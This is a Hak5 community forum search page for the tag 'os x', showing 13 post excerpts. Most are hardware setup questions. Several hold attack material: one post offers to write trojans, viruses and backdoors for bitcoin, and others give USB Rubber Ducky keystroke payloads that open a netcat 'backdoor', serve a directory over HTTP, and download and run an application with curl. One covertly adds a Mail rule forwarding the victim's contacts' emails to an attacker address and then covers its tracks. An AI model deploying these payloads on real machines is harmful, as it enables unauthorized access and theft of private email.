Jump to content

Search the Community

Showing results for tags 'os x'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 13 results

  1. I am not sure if this is the right bored to be talking about this I am willing to code Trojans,Viruses,Bots and any other type of malware in exchange for bitcoins. It could do just about anything you want example: Backdoor a system, Destroy the entire computer, Delete files, Record video and audio, etc pm me if your interested
  2. Does anyone know how to flash new firmware for the ducky on OS X? Thanks in advance
  3. This simple payload opens Terminal, moves to a directory and then creates a http server that you can go and download those files. You may want to change directory and the server port. In the payload the port is 8000 DELAY 1500 GUI SPACE DELAY 300 STRING Terminal DELAY 200 ENTER DELAY 500 STRING cd (directory to show) ENTER STRING python -m SimpleHTTPServer 8000 ENTER GUI M Directory Server.txt
  4. This small part of a payload will open the terminal and hide it in the top left of the screen. This is done thanks to a built in tool that allows you to use AppleScript from the terminal. It is called osascript and can be used in many other ways. You can use this at the beginning of a large payload. REM Coded by HH1 REM hh1rimrock@gmail.com REM REM Target: REM “Mac OS X” REM REM Description: REM This script will open a Terminal window REM And then shrink and hide it in the top REM of the screen using osascript REM REM DELAY 1500 GUI SPACE DELAY 30 STRING “Terminal” DELAY 200 ENTER DELAY 500 STRING osascript \ STRING -e 'tell application "Terminal"' \ STRING -e 'set size of front window to {36, 36}' \ STRING -e 'set position of front window to {0,25}' \ STRING -e 'end tell' DELAY 200 ENTER REM REM You can add whatever you want to the end here REM Keep in mind a terminal window is alread
  5. Does anyone want to write OS X and/or linux payloads together? you can email me at: hh1rimrock@gmail.com
  6. This Payload is tested in the latest version of OS X El Capitan. It Simply opens Terminal and starts a reverse NetCat to your computer, when it connects it minimizes the terminal window You might want to mess around with the delay DELAY 1000 GUI SPACE DELAY 200 STRING TERMINAL DELAY 300 STRING nc -l IPADRESS 8888 DELAY 100 GUI M Temperary NC backdoor.txt
  7. This payload has been tested on the latest version of OS X El Capitan. It Opens applescript and types in some codes that tells mail to forward all email's from people who are in the users contact to your own private email address. It then deletes the applescript code and opens terminal to quit applescript and terminal. You might want to mess with the delay DELAY 1500 GUI SPACE DELAY 300 STRING script editor DELAY 200 ENTER DELAY 500 GUI n DELAY 500 STRING tell application "Mail" STRING set newRule to make new rule at end of rules with properties {name:"apple mail", enabled:true, forward message:"Your email address"} STRING tell newRule STRING make new rule condition at end of rule conditions with properties {rule type:sender is in my contacts} STRING end tell STRING end tell GUI R DELAY 600 GUI A STRING . GUI SPACE DELY 300 STRING Terminal DELAY 300 ENTER DELAY 500 STRING killall Script\ Editor DELAY 200 STRING killall Termianl Applescript Email Forward
  8. Hello everyone, I've been looking for the past couple of hours for the best wireless dongle to buy, which I found out that is the : alfa awus036nha. But then a second before purchasing I was thinking to myself, could be that it's not compatible with my mac ?. So the question is, is it compatible with my Mac OS 10.9.4 version ? From a first look it seems that it won't be compatible and that the one that is recommended to buy is awus036nh. What would you suggest me to get ?
  9. I've recently been installing quite a couple virtual machines to try out my little duckies (nothing to say about the windows scripts, they work wonders and we have plenty of feedback on that part). Yet, I need infection penetration testing on Mac OS X, and I can't seem to find much going on around the forums about that subject. All I need, basically, is an understanding of their functionalities, and when I need a sudo password (like to disable Gatekeeper) or if simply being in terminal will bypass that for a simple app installation. I'm only looking to download and execute an application downloaded from an external website, but what bugs me the most is that I can't get past the first steps. I have been using Jesse Wallace (c0deous) and Patrick Mosca's help by taking parts of their codes to make it work, and have been changing remotely the language used both by the duckencoder 2.6.3 (or whatever version it is) for canada french, english (us-french), canada english, have been also transforming the keyboard mapping inside the virtual machine itself to make sure it fitted well with the injection, but nothing worked. Everytime I started the code DELAY 1000 COMMAND SPACE The space command seems to be working good at least haha, does open the top-right corner prompt DELAY 800 STRING Terminal Here starts the problem. Terminal comes out as something like IAELtmin, tried making a sense out of it but I really couldn't. Every language gave a different but similar output, and none was able to fix the problem. DELAY 500 ENTER Problem number 2 : Despite the weird wording, it doesnt even press enter at this point, because I see some recommendations from Apple being highlighted, so naturally after the first fail it should keep on going for the next, yet it doesnt, which is weird. DELAY 500 STRING curl http://SERVER/path/to/file.app > file.app ENTER DELAY 2000 (give it some time to download it) STRING open -a file ENTER And it keeps on writing without ever pressing the ENTER key, and mixing all the letters together. Now I've been working with iAtkos if anyone is familiar with it, all setup good, and have worked hours and tried many different variables to make this work but the foundations itself don't wok (even the online encoder couldn't give me a good inject.bin output on the field) So I was wondering if anyone has had these problems before, and if there is a way to fix it? Is it because it runs inside a VM and not a real Mac, and otherwise it would work? Is it simply because of an encoding/payload problem? Also, on a sidenote, living in a french-canadian area where I have no clue which language my friends have, I was wondering if the canadian keyboard was unilateral, same for everyone, and if, whether they are writing in english or french the payload should work anyways (all with canadian keyboards, all QWERTY, simply ctrl+shift changes the key mapping from french to english). Anyways, I'll be glad to hear from you guys soon, you seem like a great community, and this product is amazing as far as I tested it on Windows. Thanks in advance! -domino
  10. Hey guys, If anyone's aware of THC's IPV6 attack suite against the IPV6 protocol, please lend me a hand. Flood_router26 and other tools in the suite only run on linux natively, the readme suggests they will not work on OS X. Are there any alternative methods for router flooding from native OS X? Thanks
  11. I just got my Rubber Ducky a few hours ago and when I attempt to use it on my Mac it pop up with the Keyboard Setup Assistant instead of executing the inject.bin. Running Mavericks 10.9.2. I've read around this forum and have read about updating the firmware to 2.1 and changing the PIN and VIN. I am new to the terminal and I don't really know how to update the firmware. I attempted to install dfu-programmer, but got a usb.h error, so I read around more and downloaded usblib installed that, but still got the error. I copied the usb.h file into the /usb/include location, still got errors, but it may have worked... I dont know. Even with this maybe installed I don't know how to exactly update the firmware on my Rubber Ducky. Can someone please direct me to or instruct me on how to get it to work on Mavericks and bypass the Keyboard Setup? Thank you in advance. note: it functions completely fine on my windows xp machine.
  12. OK.. I have been on this for about 12 hours now trying to setup my Pineapple. I..Think..I..Need..help.. I'm breaking down my setup/connection so you all get the gist. Computer Hardware: 15" Retinal MBP Pineapple hardware Version: MarkV Pineapple Firmware Version: 1.0.4 OS used to connect to the Pineapple: OS X Mavericks Network Layout: Pineapple is supplied power from wall outlet. I have my wifi pineapple connected to my Mac via USB to ethernet, ethernet cable connected into pineapple. My Mac is connected via WiFi from my personal Access Point. I have manually configured the settings per the booklet that came with the Pineapple.-- IP address: 172.16.42.42 / subnet mask 255.255.255.0 / DNS server: 8.8.8.8 (I have toggled this on and off) . I have set the connection service order Wi-Fi FIRST and then USB ethernet SECOND. REMINDER: (no I'm not forgetting the part where I turn on ICS in the sharing tab inside system preferences.. I'll get to that part in just a moment) After the hardware is set up you go to sign in and essentially when setting up the pineapple you have to create a password, accept the terms and then you're in. Walla, right?! not so much. Here's what happened... After the "first boot setup" I Looked at the pineapple hardware and noticed I got a solid green. "POWERED" and secondly I get Yellow "ETHERNET". I got in and played around checking out the WiFi Pineapple - Management interface. Went to set up Karma it was as easy as typing in your personal access point name and then clicking START from the main menu. The newly named AP would show up in the "looking for WiFi networks" menu. AWESOME. Went to connect to the device with another computer to start this party and no connection. Bummer. Then I noticed that I had not turned on ICS. Turned that on in system preferences / sharing tab and toggled USB Ethernet check box then checked internet sharing and POW we should have connection right? nope. This is where it all went down hill. After I did this I tried to connect back to the http://172.16.42.1:1471 site and it would not. Turned off ICS and rebooted my computer and I get connection. weird. I thought something went wrong so I reset the Pineapple to system defaults. Went through everything again and same issue occurred. Went to try and run updates and no connection. This is with ICS turned OFF. Here's where things get weird.. After the 3rd or 4th default reset (using the dip switches, AWESOME) I noticed a solid blue light on the pineapple "ARN331"... Not sure what caused that but I got something different. Went to run updates and randomly I could! (at this point the pineapple could connect to run updates and install infusions but not give off any wifi to have other clients connect) I ran all my updates and even did the firmware update 1.0.4 and I thought surly I was good to go. At this point I downloaded infusions and getting everything set up. Went to have some fun and tried to connect a computer to Karma's "made up AP" that I created and stillllll no connection. Frustrated I reset back to defaults and tried everything over again. Firmware is still at 1.0.4 (latest update as of 11/23/2013) This time I get ALL LIGHTS on my pineapple! green yellow blue and red! (this is still with no ICS on.. because IF I do that I can't even connect to http://172.16.42.1:1471 it just times out on my web browser) Went to connect a device to my Karam "made up AP" and walla I had it made. Don't know what I did different but I had connection. Just to make sure it was not a fluke. I unplugged the Pineapple and connected it back up and now I only get green yellow blue lights. ------------------------- My setup: I have not changed a thing. Everything is still the same, yet I got different results after a power cycle. I tried a different ethernet cable but they both responded the same. Rebooted my computer multiple times to make sure connection was clear. ERRORS I get right now: When I go to Pineapple bar I get "Error connecting. Please check your internet connection!" (but remember I got into here to run updates before.. with the same exact settings before) I also get the error under Network tab Internet IP: "error connecting"... although randomly when I could connect to the pineapple bar/ run updates but NOT have karma working I got a internet IP (obviously) My Question is: What should my settings be? I had full connection but lost it. I have read and re read all the OS X Setup forums. The youtube videos. None of them work.. suggestions? I'm willing to do anything, to start all over, to order a new one whatever at this point.. I just want this thing to work.. what should my settings be?
  13. I cannot connect to the Pineapple's web-based control center on a Mac OS X. I have followed the instructions provided by Chris Haralson's tutorial (link shown below), but, when I enter the ip address 172.16.42.1:1471, nothing happens! Can someone help me out? Thanks in advance! Link: "How to: Configure a Wifi Pineapple for use with Mac OS X" Steps: (i) In the "Network" tab, I set the service order (wifi above the ethernet) (ii) Manually configured the ethernet as IPv4 address : 172.16.42.42 Subnet Mask : 255.255.255.0 Router: (blank) Dns server:8.8.8.8 (iii). In the "Sharing" tab, i checked internet sharing with sharing from "wifi" to "ethernet" (iv). Powered up the Pineapple Mark IV and connected it's PoE LAN port to my Mac OS X 10.8.4 64-bits kernel (Intel-based) (v). Opened web browser (Safari Version 6.0.5) and entered the ip address 172.16.42.1:1471. Nothing happens here!
×
×
  • Create New...